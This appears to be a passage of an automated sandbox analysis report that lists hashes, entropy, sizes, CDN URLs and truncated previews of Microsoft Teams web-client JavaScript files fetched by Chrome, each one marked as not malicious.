                                                                                                                                                                                                                                                                            SHA-256:FA8E7CB8075B8EFDD28D1B3D7B6430111C1B862532809F21931C9ADB44D0B531
                                                                                                                                                                                                                                                                            SHA-512:C9A98E263DB8215D3B1EC7FA2B3BDFF9807CD5AEF1B74DBAB6322B4E689EDE435DB24772005E2CC9AE85BAEFA5E8AF4A39B6EE21B3CA7E59AD2B3C7C563D4607
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/166017-2ac8e8df661d5d48.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[166017],{166017:(a,l,c)=>{c.d(l,{Dgf:()=>Z,zLX:()=>e,BTT:()=>M,hSs:()=>v,hD3:()=>m,HNj:()=>r,to8:()=>o,GNZ:()=>H,caz:()=>i,eFq:()=>n,i1Y:()=>V,OMj:()=>u,Mxb:()=>t,wHO:()=>U,CA_:()=>s,WGQ:()=>A,k7A:()=>L,oaK:()=>g,swq:()=>d,qVy:()=>R,KCZ:()=>C});var h=c(693935);const Z=(0,h.U)("Megaphone20Filled","20",["M16.11 3.35A1.5 1.5 0 0 1 18 4.8v10.31c0 1.03-1 1.75-1.97 1.43l-4.76-1.59A3.25 3.25 0 0 1 5 13.75v-.89l-1.97-.66A1.5 1.5 0 0 1 2 10.78V8.27c0-.68.46-1.28 1.11-1.45l13-3.47ZM6 13.2v.56a2.25 2.25 0 0 0 4.32.88L6 13.2Z"]),e=(0,h.U)("Megaphone20Regular","20",["M18 4.8c0-.98-.93-1.7-1.89-1.45l-13 3.47A1.5 1.5 0 0 0 2 8.27v2.5c0 .65.41 1.23 1.03 1.43l1.97.66v.89a3.25 3.25 0 0 0 6.27 1.2l4.76 1.59A1.5 1.5 0 0 0 18 15.1V4.81Zm-7.68 9.83A2.25 2.25 0 0 1 6 13.75v-.56l4.32 1.44Zm6.05-10.31a.5.5 0 0 1 .63.48v10.31a.5.5 0 0 1-.66.48l-13-4.34a.5.5 0 0 1-.34-.47V8.27a.5.5 0 0 1 .37-.48l13-3.4
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):541760
                                                                                                                                                                                                                                                                            Entropy (8bit):5.737507841275947
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:NNC0BomB2O7xd2TE/qwt1M9CjdO1ENxt52TEd:CqomTc8qwt1M9CjdWEvt4I
                                                                                                                                                                                                                                                                            MD5:5EDD1B8C1AA1468EDDEA635D049B52C8
                                                                                                                                                                                                                                                                            SHA1:73F2F0C339231BD489391DA72EB66E63B2A48239
                                                                                                                                                                                                                                                                            SHA-256:1B457EC13FE24E863F588CE69BE6A0A9AC1948761590B79B44988ACE7C3511CF
                                                                                                                                                                                                                                                                            SHA-512:4B056D5463A92578D511FE3D40E70DB24720AE74C3C47654BED874E2A8151D0CD35B522733AC1551C37992A982B4261DADB71658C69FEAE41AE7E5D45CA94498
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[13290],{78727:(e,t,n)=>{e.exports=n.p+"133bf0a0b104ec3dfc5b9ab207e54873.svg"},960935:(e,t,n)=>{e.exports=n.p+"c52bdfa460d7b878541ff0d9833e3c7b.svg"},870586:(e,t,n)=>{e.exports=n.p+"93bf1cc8b8b8092aab2c385d85d22c8d.svg"},834818:(e,t,n)=>{e.exports=n.p+"79f07ba26ed583574678b31546848509.svg"},603313:(e,t,n)=>{e.exports=n.p+"33c8b3e3c8d71273ed9abc4d1bec9bcc.svg"},567322:(e,t,n)=>{e.exports=n.p+"5d07fdf28991f39897b8734021141a6f.svg"},604322:(e,t,n)=>{e.exports=n.p+"0d10d16cedc7b8262d0863ae455bb683.svg"},791542:(e,t,n)=>{e.exports=n.p+"774888c01ebff051c2cad178c17079b3.svg"},118356:(e,t,n)=>{e.exports=n.p+"36fd037c0c6525c9044c5c8ef757c740.svg"},952388:(e,t,n)=>{e.exports=n.p+"5066e146579e847ea9f2d818aab586bb.svg"},152248:(e,t,n)=>{e.exports=n.p+"7aa4c2455abe8a0c8cfa1e8e4b93494c.svg"},444257:(e,t,n)=>{e.exports=n.p+"e0420569cdac40ed7e659a1dae697de8.svg"},698037:(e,t,n)=>{"use strict";n.d(t,{hT:()
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47694)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):47695
                                                                                                                                                                                                                                                                            Entropy (8bit):5.401531363850578
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                                                                                                                                                                                                                            MD5:1685878B80EECB073E51C13F17A5E530
                                                                                                                                                                                                                                                                            SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                                                                                                                                                                                                                            SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                                                                                                                                                                                                                            SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4149)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):4257
                                                                                                                                                                                                                                                                            Entropy (8bit):4.471812584842707
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:hydDBZSb/w5jO7Pnwn6irx69i9O67QynsMqXrKz+cQA+A6I:hydlZSb77PSd6YO6MMsMC+n7+Ah
                                                                                                                                                                                                                                                                            MD5:1BE4CDDC6D571645E8EE9A751FAF7EB1
                                                                                                                                                                                                                                                                            SHA1:02E2FFF3FBD785F74089C9CB1D380A15335734D4
                                                                                                                                                                                                                                                                            SHA-256:7EE97714B3FF1AE9124B8737D04D448D2FDB697BF332F5B2D22593D5916EF217
                                                                                                                                                                                                                                                                            SHA-512:2F56DF1A4C068808C904E1DDAEF311E625420B46593E8221FFD404F4D290A4BF791A291BD957A08352FF7665CFD569F44417D17231122588BCF83C338DCB654E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/118046-b79764f5406c6892.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[118046],{727467:(C,s,e)=>{e.d(s,{f:()=>c});var a=e(957032);const c=(0,e(485529).Ke)({svg:({classes:C})=>(0,a.Y)("svg",{viewBox:"2 2 16 16",role:"presentation",className:C.svg,children:(0,a.Y)("path",{d:"M4.08859 4.21569L4.14645 4.14645C4.32001 3.97288 4.58944 3.9536 4.78431 4.08859L4.85355 4.14645L10 9.293L15.1464 4.14645C15.32 3.97288 15.5894 3.9536 15.7843 4.08859L15.8536 4.14645C16.0271 4.32001 16.0464 4.58944 15.9114 4.78431L15.8536 4.85355L10.707 10L15.8536 15.1464C16.0271 15.32 16.0464 15.5894 15.9114 15.7843L15.8536 15.8536C15.68 16.0271 15.4106 16.0464 15.2157 15.9114L15.1464 15.8536L10 10.707L4.85355 15.8536C4.67999 16.0271 4.41056 16.0464 4.21569 15.9114L4.14645 15.8536C3.97288 15.68 3.9536 15.4106 4.08859 15.2157L4.14645 15.1464L9.293 10L4.14645 4.85355C3.97288 4.67999 3.9536 4.41056 4.08859 4.21569L4.14645 4.14645L4.08859 4.21569Z"})}),displayName:"PeoplePickerDis
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14946)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15054
                                                                                                                                                                                                                                                                            Entropy (8bit):5.152646782756875
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:soyB0m0WM9ymIOoNopcFBsVJbt6Bj4j5V2fMgweKxbAYUNmcz:ByB0VW9mIVipcvQDxEYUNF
                                                                                                                                                                                                                                                                            MD5:AB668D7FD64D6D724AACC13835600172
                                                                                                                                                                                                                                                                            SHA1:270F06034E2A78879F7266A6C0EEE7B0E3C9C638
                                                                                                                                                                                                                                                                            SHA-256:3640B1F9D4CE4975E2F7E4DE3FFA59BD73829A83258DC18DC0125B1DF281742F
                                                                                                                                                                                                                                                                            SHA-512:44B975C509BB412FBA65E54E9B346C09E4454E8986480DD28FAD992D8197801F64B30C625F6166AD2EB0C9E59FA89DA2BF30B1C7B6177DCBD8BC44449F880432
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[425104],{425104:(e,t,n)=>{n.d(t,{Zb:()=>F,Ag:()=>G,kD:()=>w,lg:()=>_,CK:()=>O});const i=Object.entries||function(e){return Object.keys(e).map((function(t){return[t,e[t]]}))};var s=n(305573),o=n(615582);function r(e,t){for(var n=Object.create(null),s=0,o=i(e);s<o.length;s++){var r=o[s],a=r[0],u=r[1];n[a]=t(u,a)}return n}function a(e){if(null===Object.getPrototypeOf(e))return e;for(var t=Object.create(null),n=0,s=i(e);n<s.length;n++){var o=s[n],r=o[0],a=o[1];t[r]=a}return t}var u=n(241921),c=n(625482),f=n(855752),p=5;var d=n(689054);function l(e){return e}var h=n(743357);var v=function(){function e(e){this._input=e,this._inputLowerCase=e.toLowerCase(),this._inputArray=y(this._inputLowerCase),this._rows=[new Array(e.length+1).fill(0),new Array(e.length+1).fill(0),new Array(e.length+1).fill(0)]}return e.prototype.measure=function(e,t){if(this._input===e)return 0;var n=e.toLowerCa
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (29164)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):29271
                                                                                                                                                                                                                                                                            Entropy (8bit):5.260754552284906
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:DQ67DRxmNsJwEtzCsJLpWby1gGDsksG0LsYz2kWSPzQDsS4TipmP13YUE:dnRxmNs7JCZyTRsNLAFgG
                                                                                                                                                                                                                                                                            MD5:E15F49CEEEF1DFCBB6895C908C5C95A0
                                                                                                                                                                                                                                                                            SHA1:D20EEB38BBE2444DDB00EF916FFE0CF7F9EFD6DE
                                                                                                                                                                                                                                                                            SHA-256:BC2E59A7B53B6FB40172062F2EAB834C410A2AB4308B338B597F87D68C45CE85
                                                                                                                                                                                                                                                                            SHA-512:42B20B5D7AAF393E3C006ACF75A1343AC4BE0F5A8451F5178F39873FB1162A7AC8076333059C7126E56EEDBA672470B70F402C90F295D4B1A53C1C2A3786EE64
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/56182-36ed9a9791d0ed96.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[56182],{469218:(e,t,i)=>{var r;i.d(t,{f:()=>I}),function(e){e.p720="720p",e.p1080="1080p",e.p2k="2k",e.p4k="4k",e.unkown="unkown"}(r||(r={}));const s=2073600,n=3686400,o=8294400;async function a(e){const t={Perf_Screen:void 0};let i;const a=e.screen.availWidth*e.screen?.availHeight;return i=a<s?r.p720:a>=s&&a<n?r.p1080:a>=n&&a<o?r.p2k:a>=o?r.p4k:r.unkown,t.Perf_Screen={width:e.screen?.availWidth,height:e.screen?.availHeight,resolution:i,dpr:e.devicePixelRatio},Promise.resolve(t)}var c;!function(e){e.Initializing="Initializing",e.Unrecoverable="Unrecoverable",e.LongInactive="LongInactive",e.Inactive="Inactive",e.Active="Active",e.VeryActive="VeryActive"}(c||(c={}));var l=i(492090),p=i(332752),h=i(34655),d=i(873529),u=i(464122);async function m(e,t,i){const r={workers:[],processes:[],windows:[]},s=await(e?.loadModule("heartbeat"));if(!s?.getPerfMetrics)return r;const n=r;try{le
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22233)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):22350
                                                                                                                                                                                                                                                                            Entropy (8bit):5.354768146323387
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:j6moO1OhHwAeAyz+NTglTuTETMCDTVDTsDTPDT5EDT+DTIL1DTa+dv6MWYk4zDTI:j6moO1OhHbNTglTuTETMmTVT8T7T5kTk
                                                                                                                                                                                                                                                                            MD5:F8D1F88680491EC04E1E21B710A84F23
                                                                                                                                                                                                                                                                            SHA1:C271AF2FE61585DFB3152F2E4074B05FED20A6C3
                                                                                                                                                                                                                                                                            SHA-256:DDEC22EB66FAAB5AA0F1752965F82B531F26E223F6CD1A26AD9D1EDB91CDDB40
                                                                                                                                                                                                                                                                            SHA-512:0D35C8FC04CCEEE5D5716C8F2F07B95C60E4CCC72026D9CE4D15B0A5D0669D309C355F5F83C744D6D146289BA565EBF2E5191B4BE0A61312F29CE1872BE07D2D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/services-people-4d337dc4017c058c.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[136417],{943719:(e,s,t)=>{t.r(s),t.d(s,{ANONYMOUS_USER_MRI_TFL_PREFIX:()=>h.F,ANONYMOUS_USER_MRI_TFW_PREFIX:()=>h.et,AliasVisibilitySetting:()=>p.X3,DEFAULT_ZERO_STATE_SUGGESTIONS_TO_SHOW_COUNT:()=>h.X7,EventActionTakenTypes:()=>te.Hh,EventTypes:()=>te.wf,FederatedUserStatus:()=>p.SV,HTTPRequestMethod:()=>p.FL,LayoutTypes:()=>te.ui,M365PersonaType:()=>h.SG,PSTN_MRI_PREFIX:()=>h.Oc,PeoplePickerFilterType:()=>te.gI,PeoplePickerFilters:()=>se.H,PeoplePickerFor:()=>te.d1,PeoplePickerItemType:()=>h.lT,PeopleSearchSource:()=>te.f_,PeopleService:()=>Y,PeopleServiceApiName:()=>p.GA,PeopleUtilities:()=>h.af,PhoneType:()=>p.L,ProfilePictureSize:()=>p.xi,ProfilePictureSizesDescriptions:()=>p.Xz,ProfileUpdateChangeType:()=>Z,ProfileUpdateSyncService:()=>pe,ProfileUpdateSyncStatus:()=>ee,Provider:()=>te.Kq,RequestType:()=>p.Yw,StatusCodeFromMTResponse:()=>p.s9,TFL_SMS_UN_VERIFIED_MRI_PREF
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (16073)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):16216
                                                                                                                                                                                                                                                                            Entropy (8bit):4.819465766419485
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:ys3Ja7t6zrFEOcsyB1w4saUut7gGQed7iLOy9XUWKVm/Zm2Z3Wy7TQDvi5hxXM/f:ySa7umBpvcNAVMZ79y0O
                                                                                                                                                                                                                                                                            MD5:A5FEB36E9E2D1F582AE5CDDDDB931036
                                                                                                                                                                                                                                                                            SHA1:FB27DD5E04BF84483F125DA2D7D5EFEFC782F375
                                                                                                                                                                                                                                                                            SHA-256:CB8EEB22A1B111840BD22EE3B68C6B31FB33314485517CF6F0667BD89E9DEEB3
                                                                                                                                                                                                                                                                            SHA-512:3EE561D91CF85F20CA5A0D75926A19EEED2672197430EE522BFDB3D8FCB3C8D96DA89C011752F27290C60209D5C7EE4D0C440620F0B583AD374AB552C8F252A2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78047],{890679:(e,t,i)=>{i.r(t),i.d(t,{default:()=>a});const a={namespace:"premiumBenefits",locale:"en-us",translations:{current_plan_names:"{{planName1}} & {{planName2}}",current_plan_title:"Your free benefits",discover_try_buy_60_days_trial:"60-day trial, no card required",discover_try_buy_60_days_trial_exp:"Free 60-day trial, subject to eligibility",discover_try_buy_banner_count_down_mf:"{count, plural, =0 {You have # days left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} =1 {You have # day left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} other {You have # days left in your Teams Premium trial. Get
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1846)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1954
                                                                                                                                                                                                                                                                            Entropy (8bit):5.235922559299956
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3ajYEjENkjuX8Vv30IaCUcYtZsjhasXls2OvGpYsHHfWs3lJF2t7AsQksbR:4jYEjENkjuXgvESUDXUaklcsYOesj2t8
                                                                                                                                                                                                                                                                            MD5:1D699FA4A71C9B7AF307FD055FD60673
                                                                                                                                                                                                                                                                            SHA1:17881139B9A85CB04CE94F7D69FDB3A146A075F2
                                                                                                                                                                                                                                                                            SHA-256:4DA7BFBBFBE1C5B2A2AD8E4B71D35054943BEE0810045738DB645D2F99CE66FF
                                                                                                                                                                                                                                                                            SHA-512:7D9AEB65B5FE25560BD2E14C4BDCAED9D63C1563E459528A0C1964B66E59688B1A3A358368B44172C3DE97134B9F008D60B6BC922C1DB0586ADC45DBD034BD97
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/829271-5bfd7ab6aba19f68.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[829271,51652],{829271:(e,t,o)=>{o.r(t),o.d(t,{AnnounceProvider:()=>M,AnnounceProvider_unstable:()=>M,BackgroundAppearanceProvider:()=>w,CustomStyleHooksContext_unstable:()=>k,CustomStyleHooksProvider_unstable:()=>y,OverridesProvider_unstable:()=>p,PortalMountNodeProvider:()=>H,Provider_unstable:()=>P,ThemeClassNameProvider_unstable:()=>a,ThemeContext_unstable:()=>r,ThemeProvider_unstable:()=>u,TooltipVisibilityProvider_unstable:()=>c,useAnnounce:()=>O,useAnnounce_unstable:()=>O,useBackgroundAppearance:()=>N,useCustomStyleHook_unstable:()=>A,useFluent_unstable:()=>x,useOverrides_unstable:()=>h,usePortalMountNode:()=>S,useThemeClassName_unstable:()=>d,useTooltipVisibility_unstable:()=>C});var n=o(513432);const r=n.createContext(void 0),u=r.Provider,i=n.createContext(void 0),s="",a=i.Provider;function d(){var e;return null!==(e=n.useContext(i))&&void 0!==e?e:s}const v=n.createCo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65527), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):596983
                                                                                                                                                                                                                                                                            Entropy (8bit):5.131989087220856
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:sBQ0RWGn23iuWjR438c7xhBCW0XVdyVCi3yew5iZCfombq:j0RD2SDR+hwJVdoyew5iZCfoL
                                                                                                                                                                                                                                                                            MD5:4CC9D863D7DDA372C249C8E2CB95BEF4
                                                                                                                                                                                                                                                                            SHA1:49C098B155E69BECD9822A23D2019A4100E4D1B0
                                                                                                                                                                                                                                                                            SHA-256:826DFE82707BCAF68971344648AE68ADEF1F20AFB5BEF79073754390D2E6F916
                                                                                                                                                                                                                                                                            SHA-512:19D5C3A258215D15D4AA3230A3304D35C67A83D52F453C04F9510FCC9A3EF6A2A08EBC7B4DD35D1E5A2CEBA2C01A481DD1106A50ED7C3802B0B376D37A382164
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[370494],{704022:(e,t,n)=>{"use strict";n.d(t,{A:()=>s});const i=["figcaption","li"];function s(e){let t="";if(e.is("$text")||e.is("$textProxy"))t=e.data;else if(e.is("element","img")&&e.hasAttribute("alt"))t=e.getAttribute("alt");else if(e.is("element","br"))t="\n";else{let n=null;for(const o of e.getChildren()){const e=s(o);n&&(n.is("containerElement")||o.is("containerElement"))&&(i.includes(n.name)||i.includes(o.name)?t+="\n":t+="\n\n"),t+=e,n=o}}return t}},153879:(e,t,n)=>{var i;e=n.nmd(e),self,i=()=>(()=>{"use strict";var i={4199:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(935),s=n.n(i)()((function(e){return e[1]}));s.push([e.id,".ck-content code{background-color:hsla(0,0%,78%,.3);border-radius:2px;padding:.15em}.ck.ck-editor__editable .ck-code_selected{background-color:hsla(0,0%,78%,.5)}",""]);const o=s},7793:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(935),s=n.n(i)()((function(e){return e[1]}));s.pus
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32934)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):33042
                                                                                                                                                                                                                                                                            Entropy (8bit):5.117647704244785
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:26d7IlYfTyjhT2OHvcN4h7UainvhdKPcHw:Ny2OHvcN8Ag
                                                                                                                                                                                                                                                                            MD5:F021AFE4DA1C87CA9B21A43B34C8C2F8
                                                                                                                                                                                                                                                                            SHA1:7E4D35559E5220734EF5A375B961755F42E425C8
                                                                                                                                                                                                                                                                            SHA-256:C2FD338DD8293E2D65D231EF2405DEC9A159B31A8824F5CDA85B34EF00254E00
                                                                                                                                                                                                                                                                            SHA-512:CFD9CC6BBACF232767C613421F9332C09E049009C0851D1E18D8477C934EDE25F38A2DF76A154DB9E7DE0C29F37C9B493B347449FE88A77745E1DE14DD5D165A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/349794-d314feeffba7a267.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[349794],{989051:(e,o,t)=>{var r,n;t.d(o,{hB:()=>r,Tp:()=>n,Qq:()=>a}),function(e){e.Generic="Generic",e.Error="Error",e.UserAction="UserAction",e.Activity="Activity",e.DNM="DNM"}(r||(r={})),function(e){e.Success="Success",e.Failure="Failure",e.Cancelled="Cancelled"}(n||(n={}));const a={Bool:"Bool",Int64:"Int64",Double:"Double"}},934340:(e,o,t)=>{t.d(o,{LJ:()=>k,IA:()=>c,hO:()=>d,Ot:()=>s,o4:()=>h});var r=t(989051),n=t(841544),a=t(160462);const l=["facetCodes","statusCode","innerMostErrorCode","sprequestguid"];function m(e){const o=/[A-Z0-9._%`'+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}/gi;return Object.getOwnPropertyNames(e).map((t=>{if(-1===t.toLowerCase().indexOf("message")&&-1===t.toLowerCase().indexOf("error")&&-1===t.toLowerCase().indexOf("stack")&&!1===l.includes(t))return;let r=e[t];void 0!==r&&"string"==typeof r&&(r=r.toString().replace(o,"scrubbed_email"),e[t]=(0,a.ku)(r.toString(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27783)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):27891
                                                                                                                                                                                                                                                                            Entropy (8bit):5.439202906104346
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:gSSqn2uZfveZqHvxFdqfGNSPTRzotoNGMT5tT5GiYlWT5KT5TbVcUWA9h5D1rRyX:tf+OxtoskfFQLfrs
                                                                                                                                                                                                                                                                            MD5:F1AA9D0B9892214B52C3AC52DF2C0DE7
                                                                                                                                                                                                                                                                            SHA1:1E3E28897A2F8078CB3300D1CCA46B514BC0B2A9
                                                                                                                                                                                                                                                                            SHA-256:B62E880D4D12C0CAD366CC04D9B81E6E1CAC198C00829C3AADF94634D2449368
                                                                                                                                                                                                                                                                            SHA-512:BBCC11664D863D5992D5863FCA04BFB26C0ED5AB9AF7D6C1ED28ECBA6FA27C20DCC633DFFC5A593878A6190D154498CA28A2F05E70E4DD377A2111B947FC6A9F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/417548-aa8c7d7584ee7aca.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[417548],{485202:(t,e)=>{"use strict";e.byteLength=function(t){var e=s(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,i=s(t),f=i[0],u=i[1],h=new o(function(t,e,r){return 3*(e+r)/4-r}(0,f,u)),a=0,c=u>0?f-4:f;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],h[a++]=e>>16&255,h[a++]=e>>8&255,h[a++]=255&e;2===u&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,h[a++]=255&e);1===u&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,h[a++]=e>>8&255,h[a++]=255&e);return h},e.fromByteArray=function(t){for(var e,n=t.length,o=n%3,i=[],f=16383,s=0,h=n-o;s<h;s+=f)i.push(u(t,s,s+f>h?h:s+f));1===o?(e=t[n-1],i.push(r[e>>2]+r[e<<4&63]+"==")):2===o&&(e=(t[n-2]<<8)+t[n-1],i.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return i.join("")};for(var r=[],n=[],o="undefined"!=typeof Uint8Array?Uint8Array:Array
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32722)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):32830
                                                                                                                                                                                                                                                                            Entropy (8bit):5.434900034228035
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:RdSxMwawUxjFewyBUwr0J51UEMGl3FMUs4Rwxx7dLHL5U+4uW1y5olaXy+QwkwAj:97y/0VUEMzBR45G51Qwkwt+g1Se3Ls7x
                                                                                                                                                                                                                                                                            MD5:D0AF1B099077004743FA6FC83B023DEC
